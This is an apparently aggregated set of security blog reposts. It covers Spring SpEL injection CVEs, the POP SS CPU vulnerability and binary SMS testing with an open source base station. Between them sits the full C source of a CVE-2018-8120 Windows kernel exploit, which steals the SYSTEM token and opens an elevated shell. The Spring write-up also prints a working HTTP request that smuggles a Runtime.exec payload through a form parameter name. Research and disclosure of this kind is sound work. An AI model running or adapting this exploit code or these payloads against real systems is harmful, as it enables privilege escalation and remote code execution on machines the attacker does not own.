The SpelView class is also present in Spring Boot; that implementation has a custom resolver to avoid recursion. This means that while the Spring-OAuth2 project no longer uses it, other components or proprietary applications might have reused (copy-pasted) this utility class to save some time. For this reason, a new detector looking for SpelView was introduced in Find Security Bugs. The detector does not look for a specific package name because we assume that the application will more likely have a copy of the SpelView class than a reference to Spring-OAuth2 or Spring Boot classes.

Limitation & exploitability

We encourage you to keep all your web applications' dependencies up-to-date. If for any reason you must delay last month's updates, here are the specific conditions for exploitation:

Spring OAuth2 in your dependency tree
The users must have implicit flow enabled; it can be enabled along with other grant types
The scope list needs to be empty (not explicitly set to one or more elements)

The good news is that not all OAuth2 applications will be vulnerable. In order to specify arbitrary scopes, the attacker's user profile needs to have an empty list of scopes.

Conclusion

This was the second and last article of the series on SpEL injection vulnerabilities. We hope it shed some light on this less frequent vulnerability class. As mentioned in Part 1, finding this vulnerability class in your own application is unlikely; it is more likely to come up in components similar to Spring-Data or Spring-OAuth. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application with Find Security Bugs, the tool we used to find this vulnerability.
This type of vulnerability hunting can be daunting because many code patterns cause indirection, making variable tracking harder. Kudos to Alvaro Muñoz, pyn3rd and Gal Goldshtein, who reproduced the vulnerability and documented the flaw a few days after the official announcement made by Pivotal.

References

https://pivotal.io/security/cve-2018-1260: Official vulnerability announcement by Pivotal
https://pivotal.io/security/cve-2016-4977: Similar vulnerability affecting Spring-OAuth2
https://docs.spring.io/spring/docs/3.0.x/reference/expressions.html: Spring Expression Language capabilities
http://find-sec-bugs.github.io/bugs.htm#SPEL_INJECTION: Bug description from Find Security Bugs

Sursa: http://gosecure.net/2018/05/17/beware-of-the-magic-spell-part-2-cve-2018-1260/
-
Written by Philippe Arteau

This February, we ran a Find Security Bugs scan on over one hundred components from the Spring Framework, including the core components (spring-core, spring-mvc) but also optional components (spring-data, spring-social, spring-oauth, etc.). From this exercise, we reported some vulnerabilities. In this blog post, we are going to give more details on a SpEL injection vulnerability. While some proof-of-concept code and exploitation details have already surfaced on Twitter, we will add a focus on how these vulnerabilities were found, followed by a thorough review of the proposed fix.

Initial Analysis

Our journey started when we noticed a suspicious expression evaluation in the MapDataBinder.java class, identified by the SPEL_INJECTION pattern reported by Find Security Bugs. We discovered that the parameter propertyName came from a POST parameter upon form submission:

public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException {
    if (!isWritableProperty(propertyName)) { // <--- Validation here
        throw new NotWritablePropertyException(type, propertyName);
    }
    StandardEvaluationContext context = new StandardEvaluationContext();
    context.addPropertyAccessor(new PropertyTraversingMapAccessor(type, conversionService));
    context.setTypeConverter(new StandardTypeConverter(conversionService));
    context.setRootObject(map);
    Expression expression = PARSER.parseExpression(propertyName); // Expression evaluation

The sole protection against arbitrary expression evaluation appears to be the validation from the isWritableProperty method. Following the execution trace, it can be seen that the isWritableProperty method leads to the execution of getPropertyPath:

@Override
public boolean isWritableProperty(String propertyName) {
    try {
        return getPropertyPath(propertyName) != null;
    } catch (PropertyReferenceException e) {
        return false;
    }
}

private PropertyPath getPropertyPath(String propertyName) {
    String plainPropertyPath = propertyName.replaceAll("\\[.*?\\]", "");
    return PropertyPath.from(plainPropertyPath, type);
}

We were about to review the PropertyPath.from() method in detail, but we realized a much easier bypass was possible: any value enclosed in brackets is removed from the validated string and is therefore ignored. With this knowledge, the attack vector becomes clearer: we can submit a parameter whose name follows the pattern "parameterName[T(malicious.class).exec('test')]".

Building a Proof-of-Concept

An idea is nothing until it is put into action. When performing extensive code review, the creation of a proof of concept can sometimes be difficult. Luckily, that was not the case for this vulnerability. The first step was obviously constructing a vulnerable environment. We reused an example project located in the spring-data-examples repository. The web project used an interface as a form, which is required to reach this specific mapper.
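To see why the bracket-stripping regex defeats the validation, here is a minimal, self-contained reproduction of the two views of the same parameter name. The class name is ours; the regex is taken verbatim from getPropertyPath:

```java
public class BracketBypass {
    // Mirrors the getPropertyPath() regex above: strip anything in brackets
    // before the property-path validation sees it.
    static String stripBrackets(String propertyName) {
        return propertyName.replaceAll("\\[.*?\\]", "");
    }

    public static void main(String[] args) {
        String attack = "password[T(java.lang.Runtime).getRuntime().exec('test')]";
        // Validation only ever sees the benign property name...
        System.out.println(stripBrackets(attack)); // -> password
        // ...while the untouched string, payload included, is what
        // PARSER.parseExpression() later receives.
        System.out.println(attack.contains("T(java.lang.Runtime)")); // -> true
    }
}
```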
After identifying the form, we built the following request and sent it with an HTTP proxy. We were instantly greeted with the calculator spawn, confirming the exploitability of the module:

POST /users?size=5 HTTP/1.1
Host: localhost:8080
Referer: http://localhost:8080/
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
Connection: close
Upgrade-Insecure-Requests: 1

username=test&password=test&repeatedPassword=test&password[T(java.lang.Runtime).getRuntime().exec("calc")]=abc

Simple proof of concept request spawning a calc.exe subprocess

Reviewing The Fix

A complete fix was made in the changeset associated with bug id DATACMNS-1264. Here is why it can be considered really effective. While the attack vector presented previously relies on the side effect of a regex, another risk was also found in the implementation: the submitted value was parsed twice, once for validation and once again for execution. This is a subtle detail that is often overlooked when performing code review. An attacker could potentially exploit a subtle difference between the two parsing implementations. This remains theoretical because we didn't find any difference between them, but the correction made by Pivotal also addresses this double-parsing risk that could have introduced a vulnerability in the future. First, a more limited expression parser (SimpleEvaluationContext) was used. Then, a new validation of the types is performed as the expression is loaded and executed.
The isWritableProperty method was kept, but the security of the mapper no longer relies on it:

public void setPropertyValue(String propertyName, @Nullable Object value) throws BeansException {
    [...]
    EvaluationContext context = SimpleEvaluationContext //
        .forPropertyAccessors(new PropertyTraversingMapAccessor(type, conversionService)) // NEW type validation
        .withConversionService(conversionService) //
        .withRootObject(map) //
        .build();
    Expression expression = PARSER.parseExpression(propertyName);

Is my application affected?

Most Spring developers adopted Spring Boot to help with dependency management. If this is your case, you should integrate the updates as soon as possible to avoid missing critical security patches, or growing your technical debt. If for any reason you must delay the last months' updates, here are the specific conditions for the exploitation of this specific bug:

Having spring-data-commons, versions 1.13 to 1.13.10 or 2.0 to 2.0.5, in your dependency tree;
At least one interface is used as a form (for example UserForm in the spring-data-examples project);
Impacted forms from the previous conditions are also accessible to attackers.

What's next?

As the title implies, there will be a second part to this article, as a very similar vulnerability was identified in Spring OAuth2. We wanted to keep both vulnerabilities separate regardless of the similarities, to avoid confusion between the exploitation conditions and the different payloads.
You might be wondering where these SpEL injections are likely to be present, aside from the Spring Framework itself. It is unlikely that you will find web application logic directly using the SpEL API; our offensive security team only recalls one occurrence of such conditions. The most probable case is reviewing other Spring components similar to data-commons. Additional checks can easily be added to your automated scanning tools. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability. As implicitly demonstrated in this article, while this tool can be effective, confirming exploitability still requires a minimal understanding of the vulnerability class and a small analysis.

We hope that this blog post was informative. Maybe you will find a similar vulnerability yourself soon.

References

https://pivotal.io/security/cve-2018-1273: Official publication by Pivotal
https://github.com/find-sec-bugs/find-sec-bugs: Static analysis tool used to find the vulnerability

Sursa: http://gosecure.net/2018/05/15/beware-of-the-magic-spell-part-1-cve-2018-1273/
-
cve-2018-8120

Details see: http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html

#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include <strsafe.h>
#include <assert.h>
#include <conio.h>
#include <process.h>
#include <winuser.h>
#include "double_free.h"

// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET  0x124 // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET      0x0B4 // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET    0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET    0x0F8 // nt!_EPROCESS.Token
#define SYSTEM_PID      0x004 // SYSTEM Process PID

#pragma comment(lib,"User32.lib")

typedef struct _FARCALL {
    DWORD Offset;
    WORD SegSelector;
} FARCALL, *PFARCALL;

FARCALL Farcall = { 0 };
LONG Sequence = 1;
LONG Actual[3];
_NtQuerySystemInformation NtQuerySystemInformation;
LPCSTR lpPsInitialSystemProcess = "PsInitialSystemProcess";
LPCSTR lpPsReferencePrimaryToken = "PsReferencePrimaryToken";
FARPROC fpPsInitialSystemProcess = NULL;
FARPROC fpPsReferencePrimaryToken = NULL;
NtAllocateVirtualMemory_t NtAllocateVirtualMemory;

void PopShell()
{
    STARTUPINFO si = { sizeof(STARTUPINFO) };
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    CreateProcess("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
}

FARPROC WINAPI KernelSymbolInfo(LPCSTR lpSymbolName)
{
    DWORD len;
    PSYSTEM_MODULE_INFORMATION ModuleInfo;
    LPVOID kernelBase = NULL;
    PUCHAR kernelImage = NULL;
    HMODULE hUserSpaceKernel;
    LPCSTR lpKernelName = NULL;
    FARPROC pUserKernelSymbol = NULL;
    FARPROC pLiveFunctionAddress = NULL;

    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
    if (NtQuerySystemInformation == NULL) {
        return NULL;
    }
    NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
    ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!ModuleInfo) {
        return NULL;
    }
    NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
    kernelBase = ModuleInfo->Module[0].ImageBase;
    kernelImage = ModuleInfo->Module[0].FullPathName;
    lpKernelName = (LPCSTR)ModuleInfo->Module[0].FullPathName + ModuleInfo->Module[0].OffsetToFileName;
    hUserSpaceKernel = LoadLibraryExA(lpKernelName, 0, 0);
    if (hUserSpaceKernel == NULL) {
        VirtualFree(ModuleInfo, 0, MEM_RELEASE);
        return NULL;
    }
    pUserKernelSymbol = GetProcAddress(hUserSpaceKernel, lpSymbolName);
    if (pUserKernelSymbol == NULL) {
        VirtualFree(ModuleInfo, 0, MEM_RELEASE);
        return NULL;
    }
    pLiveFunctionAddress = (FARPROC)((PUCHAR)pUserKernelSymbol - (PUCHAR)hUserSpaceKernel + (PUCHAR)kernelBase);
    FreeLibrary(hUserSpaceKernel);
    VirtualFree(ModuleInfo, 0, MEM_RELEASE);
    return pLiveFunctionAddress;
}

LONG WINAPI VectoredHandler1(struct _EXCEPTION_POINTERS *ExceptionInfo)
{
    HMODULE v2;
    if (ExceptionInfo->ExceptionRecord->ExceptionCode == 0xE06D7363)
        return 1;
    v2 = GetModuleHandleA("kernel32.dll");
    ExceptionInfo->ContextRecord->Eip = (DWORD)GetProcAddress(v2, "ExitThread");
    return EXCEPTION_CONTINUE_EXECUTION;
}

DWORD FindAddressByHandle(HANDLE hCurProcess)
{
    PSYSTEM_HANDLE_INFORMATION pSysHandleInformation = new SYSTEM_HANDLE_INFORMATION;
    DWORD size = 0xfff00;
    DWORD needed = 0;
    DWORD dwPid = 0;
    NTSTATUS status;
    pSysHandleInformation = (PSYSTEM_HANDLE_INFORMATION)malloc(size);
    memset(pSysHandleInformation, 0, size);
    status = NtQuerySystemInformation(SystemHandleInformation, pSysHandleInformation, size, &needed);
    // pSysHandleInformation = (PSYSTEM_HANDLE_INFORMATION)new BYTE[needed];
    // status = NtQuerySystemInformation(SystemHandleInformation, pSysHandleInformation, needed, 0);
    // if (!status)
    // {
    //     if (0 == needed)
    //     {
    //         return -1; // some other error
    //     }
    //     // The previously supplied buffer wasn't enough.
    //     delete pSysHandleInformation;
    //     size = needed + 1024;
    //     if (!status)
    //     {
    //         // some other error so quit.
    //         delete pSysHandleInformation;
    //         return -1;
    //     }
    // }
    dwPid = GetCurrentProcessId();
    for (DWORD i = 0; i < pSysHandleInformation->dwCount; i++)
    {
        SYSTEM_HANDLE& sh = pSysHandleInformation->Handles[i];
        if (sh.dwProcessId == dwPid && (DWORD)hCurProcess == (DWORD)sh.wValue)
        {
            return (DWORD)(sh.pAddress);
        }
    }
    return -1;
}

HANDLE hDesHandle = NULL;
DWORD dwCurAddress;
PACCESS_TOKEN pToken;
DWORD *v1;
DWORD v2, *p2;
DWORD i;
PVOID Memory = NULL;
DWORD ori_ret = 0;

void __declspec(naked) EscapeOfPrivilege(HANDLE hCurProcess)
{
    __asm {
        push ebp
        mov ebp, esp
    }
    //v1 = (DWORD *)&hCurProcess;
    if (DuplicateHandle(hCurProcess, hCurProcess, hCurProcess, &hDesHandle, 0x10000000u, 0, 2u))
    {
        dwCurAddress = FindAddressByHandle(hDesHandle);
        if (dwCurAddress == -1)
        {
            printf("Find Current Process address Failed!\n");
            system("pause");
            //exit(-1);
        }
        printf("addrProcess:0x%08x\n", dwCurAddress);
        v1 = (DWORD *)dwCurAddress;
        __asm {
            push ecx ; save context
            lea ecx, Farcall
            call fword ptr[ecx]
            mov eax, [esp]
            mov [ebp-0x2c], eax
            add esp, 4
        }
        p2 = &v2;
        p2 = *(DWORD**)fpPsInitialSystemProcess;
        pToken = ((PsReferencePrimaryToken_t)fpPsReferencePrimaryToken)(p2);
        //// walk through token offset
        // if ((*p2 & 0xFFFFFFF8) != (unsigned long)pToken)
        // {
        //     do
        //     {
        //         i = p2[1];
        //         ++p2;
        //         ++v1;
        //     } while ((i & 0xFFFFFFF8) != (unsigned long)pToken);
        // }
        Memory = (PVOID)(ULONG)((char*)dwCurAddress + 0xf8);
        *(PULONG)Memory = *(PULONG)((char*)p2 + 0xf8);
        __asm {
            mov eax, [ebp-0x2c]
            push eax
            mov eax, PopShell
            push eax
            retf
        }
    }
}

int fill_callgate(int a1, int a2, int a3)
{
    int *v3; // edx
    int v4; // ecx
    signed int v5; // esi
    v3 = (int *)(a1 + 4);
    v4 = a2 + 352;
    v5 = 87;
    do
    {
        *v3 = v4;
        v4 += 8;
        v3 += 2;
        --v5;
    } while (v5);
    if (!a3)
    {
        *(DWORD *)(a1 + 96) = 0xC3;                            // ret
        *(WORD *)(a1 + 76) = a2 + 0x1B4;                       // address low offset
        *(WORD *)(a1 + 82) = (unsigned int)(a2 + 0x1B4) >> 16; // address high offset
        *(WORD *)(a1 + 78) = 0x1A8;                            // segment selector
        *(WORD *)(a1 + 80) = 0xEC00u;
        *(WORD *)(a1 + 84) = 0xFFFFu;
        *(WORD *)(a1 + 86) = 0;
        *(BYTE *)(a1 + 88) = 0;
        *(BYTE *)(a1 + 91) = 0;
        *(BYTE *)(a1 + 89) = 0x9Au;
        *(BYTE *)(a1 + 90) = 0xCFu;
    }
    return 1;
}

void main()
{
    NTSTATUS ntStatus;
    PVOID pMappedAddress = NULL;
    SIZE_T SectionSize = 0x4000;
    DWORD_PTR dwArg1;
    DWORD dwArg2;
    PVOID pMappedAddress1 = NULL;
    RtlAdjustPrivilege_t RtlAdjustPrivilege;
    DWORD dwPageSize = 0;
    char szGDT[6];
    struct _SYSTEM_INFO SystemInfo;
    HANDLE hCurThread = NULL, hCurProcess = NULL;
    HMODULE hNtdll = NULL;
    PVOID dwAllocMem = (PVOID)0x100;
    PVOID pAllocMem;
    HWINSTA hWndstation;
    DWORD temp;

    fpPsInitialSystemProcess = KernelSymbolInfo(lpPsInitialSystemProcess);
    fpPsReferencePrimaryToken = KernelSymbolInfo(lpPsReferencePrimaryToken);
    if (fpPsInitialSystemProcess && fpPsReferencePrimaryToken)
    {
        AddVectoredExceptionHandler(1u, VectoredHandler1);
        hCurThread = GetCurrentThread();
        dwArg1 = SetThreadAffinityMask(hCurThread, 1u);
        printf("thread prev mask : 0x%08x\n", dwArg1);
        __asm {
            sgdt szGDT;
        }
        temp = *(int*)(szGDT + 2);
        printf("addrGdt:%#p\n", *(int*)(szGDT + 2));
        GetSystemInfo(&SystemInfo);
        dwPageSize = SystemInfo.dwPageSize;
        hNtdll = GetModuleHandle("ntdll.dll");
        NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
        if (!NtAllocateVirtualMemory)
        {
            printf("\t\t[-] Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError());
            system("pause");
            //exit(-1);
        }
        RtlAdjustPrivilege = (RtlAdjustPrivilege_t)GetProcAddress(hNtdll, "RtlAdjustPrivilege");
        if (!RtlAdjustPrivilege) // note: the original source checked NtAllocateVirtualMemory again here
        {
            printf("\t\t[-] Failed Resolving RtlAdjustPrivilege: 0x%X\n", GetLastError());
            system("pause");
            //exit(-1);
        }
        hCurProcess = GetCurrentProcess();
        ntStatus = NtAllocateVirtualMemory(hCurProcess, &dwAllocMem, 0, (PULONG)&dwPageSize, 0x3000, 4);
        if (ntStatus)
        {
            printf("Alloc mem Failed! Error Code: 0x%08x!\n", ntStatus);
            system("pause");
            //exit(-1);
        }
        pAllocMem = operator new(0x400);
        memset(pAllocMem, 0, 0x400u);
        *(DWORD *)(*(DWORD*)dwAllocMem + 0x14) = *(DWORD*)pAllocMem;
        *(DWORD *)(*(DWORD*)dwAllocMem + 0x2C) = temp + 0x154;
        fill_callgate((int)pAllocMem, temp, 0);
        //*(DWORD *)(v22 + 20) = *(DWORD*)pAllocMem;
        //*(DWORD *)(v22 + 44) = v22[1] + 340;
        printf("ready to trigger!\n");
        hWndstation = CreateWindowStationW(0, 0, 0x80000000, 0);
        if (hWndstation)
        {
            if (SetProcessWindowStation(hWndstation))
            {
                __asm {
                    //int 3
                    push esi
                    mov esi, pAllocMem
                    push eax
                    push edx
                    push esi
                    push esi
                    mov eax, 0x1226
                    mov edx, 7FFE0300h
                    call dword ptr[edx]
                    pop esi
                    pop esi
                    pop edx
                    pop eax
                    pop esi
                }
                Farcall.SegSelector = 0x1a0;
                EscapeOfPrivilege(hCurProcess);
                PopShell();
            }
            else
            {
                int n = GetLastError();
                printf("step2 failed:0x%08x\n", n);
                system("pause");
                //exit(-1);
            }
        }
        else
        {
            int n = GetLastError();
            printf("step1 failed:0x%08x\n", n);
            system("pause");
            //exit(-1);
        }
    }
    else
    {
        printf("Init Symbols Failed! \n");
        system("pause");
        //exit(-1);
    }
}

Sursa: https://github.com/bigric3/cve-2018-8120
-
Dissecting the POP SS Vulnerability

Author: Joe Darbyshire

The newly uncovered POP SS vulnerability takes advantage of a widespread misconception about the behaviour of pop ss and mov ss instructions, which defer a pending exception until after the instruction that immediately follows them, even when that instruction is an interrupt. It is a privilege escalation, and as a result it assumes that the attacker has some level of control over a userland process (ring 3). The attack has the potential to upgrade their privilege level to ring 0, giving them complete control of the target system. By jailing the guest OS using a hypervisor which operates at a hardware-enforced layer below ring 0 on the machine, PCs protected by Bromium are immune to threats of this nature.

Today we are dissecting the pop ss / mov ss vulnerability. To understand the attack, you must first be familiar with CPU interrupts and exceptions.

CPU interrupts and exceptions

Interrupts and exceptions are used by the CPU to interrupt the currently executing program in order to handle unscheduled events such as the user pressing a key or moving the mouse. Exceptions also interrupt the currently running process, but in response to an event (usually an error) resulting from the currently executing instruction. The need for these two CPU features stems from the fact that these events are not predetermined and must be dealt with as and when they occur, rather than according to a predefined schedule.

When an interrupt or exception is triggered, it is down to the OS to decide how to handle it. There are operating system routines for each type of interrupt which can be triggered by the CPU to determine, from the current state information, how the event should be dealt with. The pop ss vulnerability takes advantage of a bug in OS routines for dealing with interrupts caused by unexpected #DB (debug) exceptions triggered in the kernel.
The root of the vulnerability

Under normal circumstances, CPU exceptions are triggered immediately upon retirement of the instruction that caused them. However, with pop ss and mov ss instructions this is deemed unsafe, since they are used as part of a sequence such as the following to switch stacks:

mov ss, [rax]
mov rsp, rbp

If mov ss, [rax] causes an exception, it would be handled with an invalid stack pointer, since the stack segment offset has been changed but the new stack pointer has not yet been set. Consequently, the design decision was made to trigger the exception on retirement of the instruction immediately following the offending instruction, to allow the stack pointer to be set correctly.

Whilst this solved the issue of exception handling with an invalid stack pointer, it had the unforeseen side effect of creating an unexpected state for the OS if the next instruction was itself an interrupt, such as in the following case:

mov ss, [rax]
int 0x1

In this scenario, due to the context switch caused by int 0x1, which is executed before the exception handler, the handler will be triggered from ring 0 despite being caused by ring 3 code. Since OS developers have been operating under the assumption that ring 0 code exclusively will be responsible for exceptions triggered within the kernel, they potentially mishandle this edge case, whereby an exception is triggered from within the kernel by a userland process.

The published paper describes one way in which the attacker can use this scenario to manipulate kernel memory in unintended ways, by tricking the kernel into operating on userland data structures when handling the exception. In the kernel, the gs segment register is used as a pointer to various kernel-related data structures. Following a system call, the kernel calls swapgs to set the gs register to the kernel-specific value, and, upon exit from the kernel, swapgs is called again to return it to its original userland value.
However, in our case, an exception was triggered before swapgs could be executed by the kernel, so the kernel is still using a user-defined gs value upon triggering the exception from ring 0. In handling the interrupt, vulnerable OSs determine whether swapgs needs to be called based on the location from which the interrupt was fired. If the exception was triggered from the kernel, the OS makes the (incorrect) assumption that swapgs has already been called when context was first switched to the kernel, so it attempts to handle the exception without executing this instruction first. As a result, the exception is handled using a user-defined gs register value, creating the opportunity to corrupt kernel memory in a manner which allows for arbitrary code execution.

Bromium immunity

Bromium VMs are immune to escape using this kind of attack, since user memory along with kernel memory is jailed within the hypervisor and specific to each instance. As a result, nothing is gained even when an attacker gains complete control of the kernel within a VM – there is no sensitive information to steal and no way for an attacker to propagate or persist.

There are certain kinds of hypervisors that are potentially vulnerable to this attack, including Xen legacy PV VMs. This is because the architecture runs the hypervisor at ring 0, whilst the kernel and userspace both operate as ring 3 processes communicating with one another via the hypervisor. As a result, if the hypervisor mishandles an exception, the attacker can obtain ring 0 on the physical machine, effectively escaping the VM. The Bromium hypervisor is protected from this threat since it operates at a hardware-enforced layer which sits behind ring 0 for all the VMs on a system.

Learn more about the Bromium Secure Platform.

Sursa: https://blogs.bromium.com/dissecting-pop-ss-vulnerability/
-
Binary SMS - The old backdoor to your new thing

Despite being older than many of its users, Short Messaging Service (SMS) remains a very popular communications medium and is increasingly found on remote sensors, critical infrastructure and vehicles due to an abundance of cellular coverage. To phone users, SMS means a basic 160-character text message. To carriers and developers it offers a much more powerful range of options, with sizes up to a theoretical maximum of 35KB and a myriad of binary payloads detailed within the GSM 03.40 specification.

Carriers make use of these advanced features for remote management. They can send remote command SMS messages to trigger and interact with hidden applications on their devices without the user's consent. Law enforcement can track a phone with 'silent' SMS messages designed not to alert the user. SMS technology also underpins a lot of Mobile Device Management (MDM) frameworks.

The coupling between a smartphone's software and its radio is a lot closer than you might think. SMS messages containing malicious payloads can be targeted at listening applications on a device and from there processed by the target software. If the software is poorly written, remote memory corruption and arbitrary code execution are possible. The vehicle for getting a payload to a target application on a phone (or smart device) is the Protocol Data Unit (PDU), which contains framed user data that is forwarded, without inspection, to a logical port on the operating system – with the privileges of the radio (usually System). This is comparable to a computer running open services on the internet without a firewall.

Legalities and options

The GSM spectrum is very expensive private property. You may not transmit (or even receive) in GSM bands without permission.
In the UK, it is an offence under the Wireless Telegraphy Act to transmit on licensed bands without permission, and furthermore intercepting GSM without a warrant is an offence under the Regulation of Investigatory Powers Act. You should apply for a licence (for example from OFCOM) before commencing GSM testing, and you will also need a faraday cage to suppress radiation. (For these reasons, GSM interfaces get less scrutiny than TCP/IP, for example.) If you feel compelled to write another OpenBTS blog, we recommend not publishing screenshots that suggest you broke the law, as this would be very irresponsible and could compromise your company's reputation.

For users on a budget, you can send SMS PDUs as a regular subscriber over an existing public carrier using a GSM modem, but you must check your carrier's terms and conditions first. Using Vodafone's terms and conditions as an example, customers are not allowed to use the service to break the law or use automated means to send texts. Scripting your testing to attack someone else's phone would definitely not be allowed, but manually sending an SMS PDU (or two) to test a phone you own could be OK. It is up to you to satisfy yourself that you are compliant with your carrier's terms and conditions.

SMS PDU mode

There are two defined modes for SMS: text mode and raw PDU mode. In PDU mode, the entire frame can be defined, which opens up a huge attack surface in the form of the (user-defined) encapsulating fields, as well as the prospect of a malicious payload being received by a target application on the phone. The beauty of PDU mode is that a poorly written software application on a handset can be exploited remotely. This is made possible through the Protocol Data Unit (PDU), which allows large messages to be fragmented as Concatenated SMS (C-SMS) and, crucially from a security aspect, messages to be addressed to different applications on a mobile using port numbers akin to TCP/IP. WAP push is a popular example of a binary PDU.
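Port addressing is carried in a User Data Header (UDH) prepended to the message payload. As an illustration (our own sketch, not from the original article), the block below builds the well-known 7-byte header that steers a message at the WAP push port 2948, with 9200 as the conventional originator port; the helper name is ours, byte semantics follow GSM 03.40:

```java
public class UdhBuilder {
    // Build a UDH carrying IEI 0x05 (application port addressing, 16-bit):
    // [UDHL][IEI][IEDL][destHi][destLo][srcHi][srcLo]
    static byte[] portUdh(int destPort, int srcPort) {
        return new byte[] {
            0x06,                   // UDHL: 6 header bytes follow
            0x05,                   // IEI: application port addressing, 16-bit ports
            0x04,                   // IEDL: 4 bytes of port data
            (byte) (destPort >> 8), (byte) destPort,
            (byte) (srcPort >> 8),  (byte) srcPort,
        };
    }

    public static void main(String[] args) {
        StringBuilder hex = new StringBuilder();
        for (byte b : portUdh(2948, 9200)) hex.append(String.format("%02X", b));
        System.out.println(hex); // -> 0605040B8423F0
    }
}
```

A listening application bound to the destination port receives the user data with no inspection in between, which is exactly the firewall-less exposure described above.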
A typical WAP push message from your carrier may contain GPRS or MMS configuration settings which, after reassembly, appear as a special message requesting user permission to apply new network configuration values defined within an XML blob. WAP might well be a legacy protocol, but it's a powerful legacy protocol which can be used for many malicious purposes.

Displaying a text message is optional. Some SMS messages can be sent to your handset without your knowledge and will never appear in your inbox (a silent SMS). Message display can also be forced by setting the 'Class 0' type (flash SMS), which will cause the SMS to display in the foreground without user interaction. This public alerting system is used in the US by the emergency services and is typically delivered as a cell broadcast, whereby all subscribers attached to a tower receive the SMS simultaneously.

SMS test environment options

When testing SMS PDUs you can do it in your own private test environment with a GSM test licence, or over a public carrier. A private environment has several key advantages:

Cost – sending lots of SMS messages can be expensive, especially once you start concatenating messages.
Control – SMS messages on a busy carrier are subject to unpredictable delays and contractual restrictions.
Debugging – a private environment will allow you to monitor messages and responses on the air interface, which is essential for early testing.

A public carrier is (potentially) much cheaper and quicker to use, with just a 3G dongle, but forfeits control and is subject to the terms and conditions of your carrier, which may not allow testing with their network.

Private SMS test environment

To inspect SMS PDUs on the air interface, a GSM base station is required. One of the best known open source base stations is OpenBTS, for which there are many setup tutorials on many different platforms. In our experience OpenBTS is indeed quick to set up, but its PDU handling needs work.
It has a Command Line Interface (CLI) for sending both types of SMS, but we found the PDU validation routine to be buggy for Mobile Terminated (MT) SMS messages, which is exactly what we're interested in. After spending a long time nailing down the validation issue (and judging by the developer's comments and try/catch blocks, we weren't alone) we happened across YateBTS, which we found to have better support for testing MT-SMS.

YateBTS can be installed on a Raspberry Pi 3, which gives the advantage of a small portable form factor: you can place it inside the faraday cage, for example, so it can be accessed by many users on a LAN. You should keep the distance between the radio and the host computer as short as possible, and do not daisy-chain USB cables, as the clock requirements are so precise that you will experience stability issues.

Kit list

All prices are approximate. A cellar or room with double concrete walls could be used instead of a faraday cage, providing your licensing authority is satisfied it will suppress emissions sufficiently (>60dB). Twelve-inch concrete blocks have 35dB of attenuation at 900MHz.

Ettus USRP B200 with 2 900MHz antennas: £600
Ettus GPS disciplined oscillator (TCXO) with GPS antenna: £500
Ramsey STE3000 RF enclosure: £1500
Raspberry Pi 3: £35
YateBTS: Free
Wireshark: Free
Osmo-trx driver: Free
Ettus UHD library: Free
Total: £2635

Building

Open source BTS tutorials age off quicker than a Gentoo kernel due to the fast moving world of open source GSM and the dynamic dependencies required. We recommend focusing on learning the standard and concepts rather than particular packages, but if you want a recent tutorial, you'll find a comprehensive one for an open source BTS (Yate) on a Pi here. OpenBTS and YateBTS don't prescribe hardware or drivers, so you can use them with multiple radios, providing those radios support the precise timing requirements of a GSM base station, which call for a frequency error of no more than 0.05 ppm.
This is relaxed to 0.1 ppm for pico cells. If you attempt to stand up a BTS without a precision clock source you will find it is unstable. You may get lucky and get your handset to see the network and attach to it briefly at close range, but it won't last and will quickly fall over once you commence testing. A precision clock is essential. The GPS unit we used requires an external GPS receive antenna and does take a while to acquire a fix (green LED) initially.

A key configuration change when using a low-power PC like a Pi is the third-party radio driver, which must be defined within ../etc/yate/ybts.conf. We had success with the official Ettus UHD driver but opted for the ARM-friendly osmo-trx transceiver compiled with UHD 003.010, defined as Path=./osmo-trx and homed at ../lib/yate/server/bts/osmo-trx

Testing

Understanding the many unique aspects of the GSM air interface is not necessary to perform SMS testing, but having a basic understanding of paging will help. Getting your handset to attach initially is half the battle; after that, the rest is quite straightforward and very much in the realm of computing, not RF.

The gsmtap PCAP output is an invaluable tool for testing your setup and monitoring traffic on the air interface. To use it, enter Yate's web UI, update the monitoring IP to your own, check the gsmtap box, then spin up Wireshark on your external interface. This feature can be used remotely, which is convenient for users on a LAN. The gsmtap UDP packets for both the uplink and downlink will be sent blindly to port 4729 on your host and will likely elicit ICMP port-closed responses.

A healthy BTS will be broadcasting data frames constantly on its Broadcast Channel (BCCH) and subscribers will be able to attach to it providing their International Mobile Subscriber Identity (IMSI) is allowed under the access rules. When initiating an SMS, the first thing the BTS does is page the handset on the Common Control Channel (CCCH) to test for its presence.
The handset should respond in kind, after which the BTS will send the SMS PDU(s) on the Standalone Dedicated Control Channel (SDCCH). In the screenshot below, a concatenated 3-part SMS has been sent over our YateBTS by subscriber 12345. Only when the final fragment arrives is it reassembled into a complete SMS. Each fragment is acknowledged separately, which is helpful for debugging concatenation issues.

Wireshark filters

Only GSM: gsmtap && !icmp
Only paging activity: gsmtap.chan_type == CCCH && !icmp
